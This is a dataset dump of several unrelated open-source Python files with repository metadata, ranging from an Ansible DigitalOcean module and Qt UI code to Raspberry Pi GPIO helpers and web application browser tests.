- "python >= 2.6"
extends_documentation_fragment:
- community.general.digital_ocean.documentation
'''
EXAMPLES = '''
- name: Gather information about all tags
digital_ocean_tag_info:
oauth_token: "{{ oauth_token }}"
- name: Gather information about tag with given name
digital_ocean_tag_info:
oauth_token: "{{ oauth_token }}"
tag_name: "extra_awesome_tag"
- name: Get resources from tag name
digital_ocean_tag_info:
register: resp_out
- set_fact:
resources: "{{ item.resources }}"
loop: "{{ resp_out.data|json_query(name) }}"
vars:
name: "[?name=='extra_awesome_tag']"
- debug: var=resources
'''
RETURN = '''
data:
description: DigitalOcean tag information
returned: success
type: list
sample: [
{
"name": "extra-awesome",
"resources": {
"droplets": {
"count": 1,
...
}
}
},
]
'''
from traceback import format_exc
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.community.general.plugins.module_utils.digital_ocean import DigitalOceanHelper
from ansible.module_utils._text import to_native
def core(module):
tag_name = module.params.get('tag_name', None)
rest = DigitalOceanHelper(module)
base_url = 'tags?'
if tag_name is not None:
response = rest.get("%s/%s" % (base_url, tag_name))
status_code = response.status_code
if status_code != 200:
module.fail_json(msg="Failed to retrieve tags for DigitalOcean")
resp_json = response.json
tag = resp_json['tag']
else:
tag = rest.get_paginated_data(base_url=base_url, data_key_name='tags')
module.exit_json(changed=False, data=tag)
def main():
argument_spec = DigitalOceanHelper.digital_ocean_argument_spec()
argument_spec.update(
tag_name=dict(type='str', required=False),
)
module = AnsibleModule(argument_spec=argument_spec)
if module._name == 'digital_ocean_tag_facts':
module.deprecate("The 'digital_ocean_tag_facts' module has been renamed to 'digital_ocean_tag_info'", version='2.13')
try:
core(module)
except Exception as e:
module.fail_json(msg=to_native(e), exception=format_exc())
if __name__ == '__main__':
main()
| 26.786885 | 125 | 0.680233 |
d5f7a410dce6f7dd61b69a822bf1cf69f9d887fe
| 748 |
py
|
Python
|
rotating_triangles/rotating_triangle_final.py
|
kantel/py5
|
1bed40dbf732fce28412a206e7c043bd9a01a521
|
[
"MIT"
] | null | null | null |
rotating_triangles/rotating_triangle_final.py
|
kantel/py5
|
1bed40dbf732fce28412a206e7c043bd9a01a521
|
[
"MIT"
] | null | null | null |
rotating_triangles/rotating_triangle_final.py
|
kantel/py5
|
1bed40dbf732fce28412a206e7c043bd9a01a521
|
[
"MIT"
] | null | null | null |
# rotating triangles final
# after Roger Antonsen (University of Oslo)
# and Peter Farrell (Math Adventures with Python, p. 93ff.)
def setup():
size(600, 600)
color_mode(HSB, 100)
t = 0
def draw():
global t
background(255, 0, 100) # white
translate(width/2, height/2)
for i in range(90):
rotate(radians(360/90))
push_matrix()
translate(200, 0)
stroke(i%360, 100, 80)
rotate(radians(t + 2*i*360/90))
tri(100)
pop_matrix()
t += 0.5
def tri(length):
"""Zeichnet ein gleichseitiges Dreieck
rund um den Mittelpunkt des Dreiecks."""
no_fill()
triangle(0, -length,
-length*sqrt(3)/2, length/2,
length*sqrt(3)/2, length/2)
| 24.129032 | 59 | 0.586898 |
e6fb0d7160d5c560cbc70824225ce6917cdd2f82
| 4,965 |
py
|
Python
|
pyScript/ui/ui_script.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
pyScript/ui/ui_script.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
pyScript/ui/ui_script.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'script.ui'
##
## Created by: Qt User Interface Compiler version 5.14.1
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (QCoreApplication, QMetaObject, QObject, QPoint,
QRect, QSize, QUrl, Qt)
from PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont,
QFontDatabase, QIcon, QLinearGradient, QPalette, QPainter, QPixmap,
QRadialGradient)
from PySide2.QtWidgets import *
class Ui_script_widget(object):
def setupUi(self, script_widget):
if script_widget.objectName():
script_widget.setObjectName(u"script_widget")
script_widget.resize(1223, 876)
self.gridLayout = QGridLayout(script_widget)
self.gridLayout.setObjectName(u"gridLayout")
self.splitter_2 = QSplitter(script_widget)
self.splitter_2.setObjectName(u"splitter_2")
self.splitter_2.setOrientation(Qt.Horizontal)
self.splitter = QSplitter(self.splitter_2)
self.splitter.setObjectName(u"splitter")
self.splitter.setOrientation(Qt.Vertical)
self.log_groupBox = QGroupBox(self.splitter)
self.log_groupBox.setObjectName(u"log_groupBox")
self.gridLayout_2 = QGridLayout(self.log_groupBox)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.logs_scrollArea = QScrollArea(self.log_groupBox)
self.logs_scrollArea.setObjectName(u"logs_scrollArea")
self.logs_scrollArea.setWidgetResizable(True)
self.scrollAreaWidgetContents = QWidget()
self.scrollAreaWidgetContents.setObjectName(u"scrollAreaWidgetContents")
self.scrollAreaWidgetContents.setGeometry(QRect(0, 0, 140, 815))
self.logs_scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout_2.addWidget(self.logs_scrollArea, 0, 0, 1, 1)
self.splitter.addWidget(self.log_groupBox)
self.splitter_2.addWidget(self.splitter)
self.contents_widget = QWidget(self.splitter_2)
self.contents_widget.setObjectName(u"contents_widget")
sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.contents_widget.sizePolicy().hasHeightForWidth())
self.contents_widget.setSizePolicy(sizePolicy)
self.contents_widget.setMinimumSize(QSize(200, 0))
self.verticalLayout = QVBoxLayout(self.contents_widget)
self.verticalLayout.setObjectName(u"verticalLayout")
self.variables_group_box = QGroupBox(self.contents_widget)
self.variables_group_box.setObjectName(u"variables_group_box")
self.gridLayout_3 = QGridLayout(self.variables_group_box)
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.variables_scrollArea = QScrollArea(self.variables_group_box)
self.variables_scrollArea.setObjectName(u"variables_scrollArea")
self.variables_scrollArea.setWidgetResizable(True)
self.scrollAreaWidgetContents_3 = QWidget()
self.scrollAreaWidgetContents_3.setObjectName(u"scrollAreaWidgetContents_3")
self.scrollAreaWidgetContents_3.setGeometry(QRect(0, 0, 991, 742))
self.variables_scrollArea.setWidget(self.scrollAreaWidgetContents_3)
self.gridLayout_3.addWidget(self.variables_scrollArea, 0, 0, 1, 1)
self.add_variable_push_button = QPushButton(self.variables_group_box)
self.add_variable_push_button.setObjectName(u"add_variable_push_button")
self.gridLayout_3.addWidget(self.add_variable_push_button, 2, 0, 1, 1)
self.new_var_name_lineEdit = QLineEdit(self.variables_group_box)
self.new_var_name_lineEdit.setObjectName(u"new_var_name_lineEdit")
self.gridLayout_3.addWidget(self.new_var_name_lineEdit, 1, 0, 1, 1)
self.verticalLayout.addWidget(self.variables_group_box)
self.splitter_2.addWidget(self.contents_widget)
self.gridLayout.addWidget(self.splitter_2, 0, 0, 1, 1)
self.retranslateUi(script_widget)
QMetaObject.connectSlotsByName(script_widget)
# setupUi
def retranslateUi(self, script_widget):
script_widget.setWindowTitle(QCoreApplication.translate("script_widget", u"Form", None))
self.log_groupBox.setTitle(QCoreApplication.translate("script_widget", u"Log", None))
self.variables_group_box.setTitle(QCoreApplication.translate("script_widget", u"Variables", None))
self.add_variable_push_button.setText(QCoreApplication.translate("script_widget", u"add", None))
self.new_var_name_lineEdit.setPlaceholderText(QCoreApplication.translate("script_widget", u"new var name", None))
# retranslateUi
| 48.203883 | 121 | 0.72004 |
5d99312bc166828cc24c9a9ef7023f8e8723ce7b
| 2,710 |
py
|
Python
|
src/tango_sdp_master/test/SDPMaster_test.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 2 |
2019-07-15T09:49:34.000Z
|
2019-10-14T16:04:17.000Z
|
src/tango_sdp_master/test/SDPMaster_test.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 17 |
2019-07-15T14:51:50.000Z
|
2021-06-02T00:29:43.000Z
|
src/tango_sdp_master/test/SDPMaster_test.py
|
ska-telescope/sdp-configuration-prototype
|
8c6cbda04a83b0e16987019406ed6ec7e1058a31
|
[
"BSD-3-Clause"
] | 1 |
2019-10-10T08:16:48.000Z
|
2019-10-10T08:16:48.000Z
|
# -*- coding: utf-8 -*-
"""Tests for the SDP Master Tango Class."""
# pylint: disable=redefined-outer-name, invalid-name
import pytest
from SDPMaster import SDPMaster
# Note:
#
# Since the device uses an inner thread, it is necessary to
# wait during the tests in order the let the device update itself.
# Hence, the sleep calls have to be secured enough not to produce
# any inconsistent behavior. However, the unittests need to run fast.
# Here, we use a factor 3 between the read period and the sleep calls.
#
# Look at devicetest examples for more advanced testing
# Device test case
@pytest.mark.usefixtures("tango_context")
class TestSDPMaster:
"""Test case for packet generation."""
# pylint: disable=, no-self-use,
# PROTECTED REGION ID(SDPMaster.test_additionnal_import) ENABLED START #
# PROTECTED REGION END # // SDPMaster.test_additionnal_import
device = SDPMaster
properties = {
'SkaLevel': '4',
'CentralLoggingTarget': '',
'ElementLoggingTarget': '',
'StorageLoggingTarget': 'localhost',
'GroupDefinitions': '',
'NrSubarrays': '16',
'CapabilityTypes': '',
'MaxCapabilities': ''
}
empty = None # Should be []
@classmethod
def mocking(cls):
"""Mock external libraries."""
# Example : Mock numpy
# cls.numpy = SDPMaster.numpy = MagicMock()
# PROTECTED REGION ID(SDPMaster.test_mocking) ENABLED START #
# PROTECTED REGION END # // SDPMaster.test_mocking
def test_operating_state(self, tango_context):
"""Test for Operating State."""
# PROTECTED REGION ID(SDPMaster.test_OperatingState) ENABLED START #
assert tango_context.device.OperatingState == 0
# PROTECTED REGION END # // SDPMaster.test_OperatingState
def test_on_state(self, tango_context):
"""Test for ON State."""
tango_context.device.on()
assert tango_context.device.OperatingState == 1
def test_standby_state(self, tango_context):
"""Test for STANDBY State."""
tango_context.device.standby()
assert tango_context.device.OperatingState == 3
def test_disable_state(self, tango_context):
"""Test for DISABLE State."""
tango_context.device.disable()
assert tango_context.device.OperatingState == 2
def test_off_state(self, tango_context):
"""Test for OFF State."""
tango_context.device.off()
assert tango_context.device.OperatingState == 6
def test_health_state(self, tango_context):
"""Test for healthState."""
device = tango_context.device
device.init()
assert device.healthState == 0
| 33.04878 | 76 | 0.663469 |
53988bbc9921c847928ac8a83642732eb22567cb
| 3,711 |
py
|
Python
|
components/py_engine/framework/network.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | 4,538 |
2017-10-20T05:19:03.000Z
|
2022-03-30T02:29:30.000Z
|
components/py_engine/framework/network.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | 1,088 |
2017-10-21T07:57:22.000Z
|
2022-03-31T08:15:49.000Z
|
components/py_engine/framework/network.py
|
willianchanlovegithub/AliOS-Things
|
637c0802cab667b872d3b97a121e18c66f256eab
|
[
"Apache-2.0"
] | 1,860 |
2017-10-20T05:22:35.000Z
|
2022-03-27T10:54:14.000Z
|
# -*- coding: UTF-8 -*-
import netmgr as nm
import time
_wifi_connected = False
def singleton(cls, *args, **kw):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls(*args, **kw)
nm.init()
return instances[cls]
return getinstance
def _on_wifi_cb(data):
print('Get Wifi CallBack for wifi.py')
_wifi_connected = True
@singleton
class NetWorkClient:
"""
该模块实现网络管理相关的功能,包括初始化,联网,状态信息等.
"""
global _on_wifi_cb
def __init__(self):
nm.register_call_back(1,_on_wifi_cb)
def __str_is_empty(self,value):
if value is None or value == "":
return True
else:
return False
def connect(self,data):
"""
连接网络
:param data(dict): data的key信息如下
.. list-table::
* - 属性
- 类型
- 必填
- 说明
* - ssid
- 字符串
- 必填
- 需要连接的wifi热点名称
* - password
- 字符串
- 必填
- 需要连接的wifi密码
使用示例::
# -*- coding: UTF-8 -*-
import network
net = network.NetWorkClient()
net.connect({
'ssid' : 'KIDS' ,
'password' : '12345678'
}
)
"""
global _wifi_cb
if isinstance(data, dict):
pass
else:
raise ValueError("connect func param must be dict")
if not 'ssid' in data:
raise ValueError('connect : param must have key "ssid"')
elif self.__str_is_empty(data['ssid']):
raise ValueError("ssid wrong")
if not 'password' in data:
raise ValueError('connect : param must have key "password"')
elif self.__str_is_empty(data['password']):
raise ValueError("password wrong")
return nm.connect(data['ssid'],data['password'])
def disconnect(self):
"""
断开网络
"""
nm.disconnect()
def getType(self):
"""
获取当前网络类型:
:param 空:
:returns:
.. list-table::
* - 返回值
- 网络类型
* - 0
- WIFI
* - 1
- 蜂窝网络
* - 2
- 以太网
* - 3
- 未知网络
"""
return nm.getType()
def getStatus(self):
"""
获取当前网络状态
:param 空:
:returns:
.. list-table::
* - 返回值
- 连接状态
* - 0
- 断开连接中
* - 1
- 断开连接
* - 2
- 连接中
* - 3
- 连接成功
* - 4
- 获取ip中
* - 5
- 获取ip成功
* - 6
- 连接失败
* - 7
- 位置状态
- ``True`` 已连接
- ``False`` 未连接
"""
return nm.getStatus()
def getInfo(self):
"""
获取当前网络信息
:param 空:
:returns: 返回一个字典,字典信息如下
.. list-table::
* - key名称
- value类型
* - SSID
- 字符串
* - IP
- 字符串
* - MAC
- 字符串
* - RSSI
- Int
"""
return nm.getInfo()
def on(self,id,func):
nm.register_call_back(1,func)
| 20.059459 | 72 | 0.371598 |
072b710f034936f9467275f81306c723e9738455
| 1,968 |
py
|
Python
|
src/Sephrasto/DatenbankSelectTypeWrapper.py
|
qeqar/Sephrasto
|
ce46d46299b2c793f015e25c98908773c39b1dee
|
[
"MIT"
] | 1 |
2022-02-02T16:15:59.000Z
|
2022-02-02T16:15:59.000Z
|
src/Sephrasto/DatenbankSelectTypeWrapper.py
|
qeqar/Sephrasto
|
ce46d46299b2c793f015e25c98908773c39b1dee
|
[
"MIT"
] | 1 |
2022-01-14T11:04:19.000Z
|
2022-01-14T11:04:19.000Z
|
src/Sephrasto/DatenbankSelectTypeWrapper.py
|
qeqar/Sephrasto
|
ce46d46299b2c793f015e25c98908773c39b1dee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 18 10:33:39 2017
@author: Aeolitus
"""
from PyQt5 import QtWidgets, QtCore
import UI.DatenbankSelectType
class DatenbankSelectTypeWrapper(object):
def __init__(self, dbTypes):
super().__init__()
Dialog = QtWidgets.QDialog()
ui = UI.DatenbankSelectType.Ui_Dialog()
ui.setupUi(Dialog)
# Todo: Should probably just rename them properly but it would require a db migration...
displayNames = {
"Manöver / Modifikation" : "Manöver / Modifikation / Regel",
"Fertigkeit" : "Fertigkeit (profan)",
"Übernatürliche Fertigkeit" : "Fertigkeit (übernatürlich)"
}
displayNames_inverse = {v: k for k, v in displayNames.items()}
types = []
for dbType in sorted(dbTypes):
if dbType == "Einstellung":
continue
if dbType in displayNames:
types.append(displayNames[dbType])
else:
types.append(dbType)
types = sorted(types)
buttons = []
for dbType in types:
button = QtWidgets.QRadioButton()
button.setText(dbType)
buttons.append(button)
ui.buttonLayout.addWidget(button)
buttons[0].setChecked(True)
Dialog.setWindowFlags(
QtCore.Qt.Window |
QtCore.Qt.CustomizeWindowHint |
QtCore.Qt.WindowTitleHint |
QtCore.Qt.WindowCloseButtonHint)
Dialog.show()
ret = Dialog.exec_()
self.entryType = None
if ret == QtWidgets.QDialog.Accepted:
for button in buttons:
if button.isChecked():
self.entryType = button.text()
if self.entryType in displayNames_inverse:
self.entryType = displayNames_inverse[self.entryType]
break
| 32.262295 | 96 | 0.560976 |
ab0730df111959f7252ac7af32617831e590cef5
| 4,013 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_interface.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_interface.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_interface.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# (c) 2019 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.cloudengine import ce_is_is_interface
from ansible_collections.community.general.tests.unit.modules.network.cloudengine.ce_module import TestCloudEngineModule, load_fixture
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
class TestCloudEngineLacpModule(TestCloudEngineModule):
module = ce_is_is_interface
def setUp(self):
super(TestCloudEngineLacpModule, self).setUp()
self.mock_get_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_interface.get_nc_config')
self.get_nc_config = self.mock_get_config.start()
self.mock_set_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_interface.set_nc_config')
self.set_nc_config = self.mock_set_config.start()
self.set_nc_config.return_value = None
self.before = load_fixture('ce_is_is_interface', 'before_interface.txt')
self.after = load_fixture('ce_is_is_interface', 'after_interface.txt')
def tearDown(self):
super(TestCloudEngineLacpModule, self).tearDown()
self.mock_set_config.stop()
self.mock_get_config.stop()
def test_isis_interface_present(self):
update = ['interface 10GE1/0/1',
'isis enable 100',
'isis circuit-level level-1',
'isis dis-priority 10 level-1',
'isis ppp-negotiation 2-way',
'isis cost 10 level-2']
self.get_nc_config.side_effect = (self.before, self.after)
config = dict(
instance_id=100,
ifname='10GE1/0/1',
leveltype='level_1',
level1dispriority=10,
silentenable=True,
silentcost=True,
typep2penable=True,
snpacheck=True,
p2pnegotiationmode='2_way',
p2ppeeripignore=True,
ppposicpcheckenable=True,
level2cost=10
)
set_module_args(config)
result = self.execute_module(changed=True)
print(result['updates'])
self.assertEquals(sorted(result['updates']), sorted(update))
def test_isis_interface_absent(self):
update = ['interface 10GE1/0/1',
'undo isis enable',
'undo isis circuit-level',
'undo isis ppp-negotiation']
self.get_nc_config.side_effect = (self.after, self.before)
config = dict(
instance_id=100,
ifname='10GE1/0/1',
leveltype='level_1',
level1dispriority=10,
silentenable=True,
silentcost=True,
typep2penable=True,
snpacheck=True,
p2pnegotiationmode='2_way',
p2ppeeripignore=True,
ppposicpcheckenable=True,
level2cost=10,
state='absent'
)
set_module_args(config)
result = self.execute_module(changed=True)
self.assertEquals(sorted(result['updates']), sorted(update))
| 39.732673 | 146 | 0.670072 |
ab438c98c3b4693f9c5289b5b22cd176e44fcdd3
| 2,639 |
py
|
Python
|
03 Python/Smart Home Dashboard/aufgabe/hwio/switch.py
|
DennisSchulmeister/dhbwka-wwi-iottech-quellcodes
|
58f86907af31187f267a9ea476f061cc59098ebd
|
[
"CC-BY-4.0"
] | null | null | null |
03 Python/Smart Home Dashboard/aufgabe/hwio/switch.py
|
DennisSchulmeister/dhbwka-wwi-iottech-quellcodes
|
58f86907af31187f267a9ea476f061cc59098ebd
|
[
"CC-BY-4.0"
] | null | null | null |
03 Python/Smart Home Dashboard/aufgabe/hwio/switch.py
|
DennisSchulmeister/dhbwka-wwi-iottech-quellcodes
|
58f86907af31187f267a9ea476f061cc59098ebd
|
[
"CC-BY-4.0"
] | 1 |
2020-10-10T20:24:05.000Z
|
2020-10-10T20:24:05.000Z
|
import time
import RPi.GPIO as GPIO
from .hwdevice import HardwareDevice
class SwitchOutputDevice(HardwareDevice):
"""
Klasse zur Ansteuerung eines einfachen, binären GPIO-Ausgangs. Der Ausgang
kann dazu genutzt werden, eine LED oder irgend eine andere Last (z.B. ein
Relais) ein oder auszuschalten. Zusätzlich kann der Ausgang in regelmäßigen
Abständen automatisch ein- und ausgeschaltet werden, um z.B. eine LED zum
Blinken zu bringen.
"""
STATE_OFF = 0
STATE_ON = 1
STATE_BLINK = 2
def __init__(self, gpio_pin):
"""
Konstruktor.
@param gpio_pin: PIN-Nummer der LED
"""
# TODO: GPIO-Pin initilisieren
self._gpio_pin = gpio_pin
self._state = self.STATE_OFF
self._blink_sec = 0
self._last_blink = 0
self._blink_on = False
self._need_update = False
def switch_on(self, on):
"""
Schaltet den Ausgang ein- oder aus.
@param on: True, wenn der Ausgang eingeschaltet werden soll
"""
self._need_update = True
if on:
self._state = self.STATE_ON
else:
self._state = self.STATE_OFF
def blink(self, blink_sec):
"""
Schaltet den Ausgang periodisch ein oder aus.
@param blink_sec: Anzahl Sekunden zwischen den Schaltvorgängen
"""
self._state = self.STATE_BLINK
self.blink_sec = blink_sec
self._last_blink = 0
def tick(self):
"""
Hauptmethode, in welcher der Ausgang tatsächlich geschaltet wird.
"""
if self._state == self.STATE_ON and self._need_update:
self._output(True)
elif self._state == self.STATE_OFF and self._need_update:
self._output(False)
elif self._state == self.STATE_BLINK:
now = time.perf_counter()
elapsed_sec = now - self._last_blink
if elapsed_sec >= self._blink_sec:
self._last_blink = now
self._blink_on = not self._blink_on
self._output(self._blink_on)
self._need_update = False
def close(self):
"""
Beenden des Hardwarezugriffs.
"""
self._state = self.STATE_OFF
self._output(False)
def _output(self, value):
"""
Hilfsmethode zum Ein- oder Ausschalten des GPIO-Ausgangs. Hier wird
der Schaltvorgang zusätzlich noch in der Konsole protokolliert.
"""
value_text = "An" if value else "Aus"
print("GPIO %s: %s" % (self._gpio_pin, value_text))
# TODO: GPIO-Pin setzen
| 29.651685 | 79 | 0.605532 |
db3b848cb3dd5ee95ffcd7e58640e33e842abc8e
| 9,547 |
py
|
Python
|
tests/onegov/feriennet/test_browser.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/feriennet/test_browser.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/feriennet/test_browser.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import time
from psycopg2.extras import NumericRange
from pytest import mark
@mark.flaky(reruns=3)
def test_browse_matching(browser, scenario):
scenario.add_period(title="Ferienpass 2016")
for i in range(2):
scenario.add_activity(title=f"A {i}", state='accepted')
scenario.add_occasion(age=(0, 10), spots=(2, 4))
dustin = scenario.add_attendee(name="Dustin")
mike = scenario.add_attendee(name="Mike")
# the first course has enough attendees
scenario.add_booking(attendee=dustin, occasion=scenario.occasions[0])
scenario.add_booking(attendee=mike, occasion=scenario.occasions[0])
# the second one does not
scenario.add_booking(attendee=mike, occasion=scenario.occasions[1])
scenario.commit()
browser.login_admin()
browser.visit('/matching')
# check the initial state
assert browser.is_text_present("Ferienpass 2016")
assert browser.is_text_present("Zufriedenheit liegt bei 0%")
assert browser.is_text_present("0% aller Durchführungen haben genug")
assert browser.is_text_present("0 / 4")
# run a matching
browser.find_by_value("Zuteilung ausführen").click()
# check the results
assert browser.is_text_present("Zufriedenheit liegt bei 100%")
assert browser.is_text_present("50% aller Durchführungen haben genug")
assert browser.is_text_present("1 / 4")
assert browser.is_text_present("2 / 4")
# try to toggle some details
assert not browser.is_text_present("Dustin")
assert not browser.is_text_present("Mike")
browser.find_by_css('.matching-details > button')[0].click()
browser.is_element_visible_by_css('.matches')
assert browser.is_text_present("Dustin")
assert browser.is_text_present("Mike")
# reset it again
browser.find_by_css('.reset-matching').click()
# without this we sometimes get errors
time.sleep(0.25)
# confirm the matching
assert browser.is_text_present("Zufriedenheit liegt bei 0%")
assert browser.is_text_present("0% aller Durchführungen haben genug")
browser.find_by_css('input[value="yes"]').click()
browser.find_by_css('input[name="sure"]').click()
browser.find_by_value("Zuteilung ausführen").click()
assert browser.is_text_present("wurde bereits bestätigt")
# verify the period's state
browser.visit('/periods')
assert 'finished prebooking' in browser.html
@mark.flaky(reruns=3)
def test_browse_billing(browser, scenario, postgres):
scenario.add_period(title="Ferienpass 2016", confirmed=True)
scenario.add_activity(title="Foobar", state='accepted')
scenario.add_user(username='[email protected]', role='member')
scenario.c.users.by_username('[email protected]').realname = 'Jane Doe'
scenario.c.users.by_username('[email protected]').realname = 'John Doe'
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=1000)
scenario.add_attendee(name="Dustin")
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[1],
state='cancelled',
cost=1000
)
scenario.add_attendee(name="Mike")
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[1],
state='accepted',
cost=1000
)
scenario.commit()
admin = browser
member = browser.clone()
admin.login_admin()
member.login('[email protected]', 'hunter2')
# initially there are no bills
admin.visit('/billing')
assert admin.is_text_present("Keine Rechnungen gefunden")
# they can be created
admin.find_by_css("input[type='submit']").click()
assert admin.is_text_present("John Doe")
assert admin.is_text_present("Jane Doe")
# as long as the period is not finalized, there's no way to pay
admin.visit('/[email protected]')
assert admin.is_text_present('100.00 Ausstehend')
admin.visit('/[email protected]')
assert admin.is_text_present('1100.00 Ausstehend')
assert 'mark-paid' not in admin.html
# as long as the period is not finalized, there are no invoices
for client in (member, admin):
client.visit('/')
assert client.find_by_css('.invoices-count').first['data-count'] == '0'
client.visit('/my-bills')
assert client.is_text_present("noch keine Rechnungen")
# once the period is finalized, the invoices become public and they
# may be marked as paid
admin.visit('/billing')
admin.find_by_css('input[value="yes"]').click()
admin.find_by_css('input[name="sure"]').click()
admin.find_by_css("input[type='submit']").click()
for client in (member, admin):
client.visit('/')
assert client.find_by_css('.invoices-count').first['data-count'] == '1'
client.visit('/my-bills')
assert not client.is_text_present('noch keine Rechnungen')
assert client.is_text_present("Ferienpass 2016")
admin.visit('/[email protected]&state=all')
assert client.is_text_present('1100.00 Ausstehend')
# we'll test a few scenarios here
postgres.save()
# pay the bill bit by bit
assert not admin.is_element_present_by_css('.paid')
admin.find_by_css('.bill button').click()
admin.find_by_css('table .unpaid .actions-button').first.click()
admin.find_by_css('table .unpaid .mark-paid').first.click()
time.sleep(0.25)
assert admin.is_element_present_by_css('.paid')
assert admin.is_element_present_by_css('.unpaid')
admin.find_by_css('table .unpaid .actions-button').first.click()
admin.find_by_css('table .unpaid .mark-paid').first.click()
time.sleep(0.25)
assert admin.is_element_present_by_css('.paid')
assert not admin.is_element_present_by_css('.unpaid')
# try to introduce a manual booking
postgres.undo()
admin.visit('/billing?state=all')
admin.find_by_css('.dropdown.right-side').click()
admin.find_by_css('.new-booking').click()
admin.choose('target', 'all')
admin.choose('kind', 'discount')
admin.find_by_css('#booking_text').fill('Rabatt')
admin.find_by_css('#discount').fill('1.00')
admin.find_by_value("Absenden").click()
assert admin.is_text_present("2 manuelle Buchungen wurden erstellt")
assert admin.is_element_present_by_css('.remove-manual')
# remove the manual booking
admin.find_by_css('.dropdown.right-side').click()
admin.find_by_css('.remove-manual').click()
assert admin.is_text_present("2 Buchungen entfernen")
admin.find_by_text("2 Buchungen entfernen").click()
time.sleep(0.25)
assert not admin.is_element_present_by_css('.remove-manual')
def test_volunteers(browser, scenario):
scenario.add_period(title="Ferienpass 2019", active=True, confirmed=True)
scenario.add_activity(title="Zoo", state='accepted')
scenario.add_user(username='[email protected]', role='member')
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
scenario.add_need(
name="Begleiter", number=NumericRange(1, 4), accept_signups=True)
scenario.add_attendee(name="Dustin")
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.commit()
scenario.refresh()
# initially, the volunteer feature is disabled
browser.visit('/')
assert not browser.is_text_present('Helfen')
# once activated, it is public
browser.login_admin()
browser.visit('/feriennet-settings')
browser.fill_form({
'volunteers': 'enabled',
'tos_url': 'https://example.org/tos'
})
browser.find_by_value("Absenden").click()
browser.visit('/')
assert browser.is_text_present('Helfen')
# users can sign up as volunteers
browser.click_link_by_text("Helfen")
assert browser.is_text_present("Begleiter")
assert not browser.is_element_present_by_css('.volunteer-cart-item')
browser.click_link_by_partial_text("Zu meiner Liste")
assert browser.is_element_present_by_css('.volunteer-cart-item')
browser.click_link_by_text("Als Helfer registrieren")
browser.fill_form({
'first_name': "Foo",
'last_name': "Bar",
'birth_date': '06.04.1984',
'address': 'Foostreet 1',
'zip_code': '1234',
'place': 'Bartown',
'email': '[email protected]',
'phone': '1234'
})
browser.find_by_value("Absenden").click()
# the volunteer is not in the helpers list yet
browser.visit('/attendees/zoo')
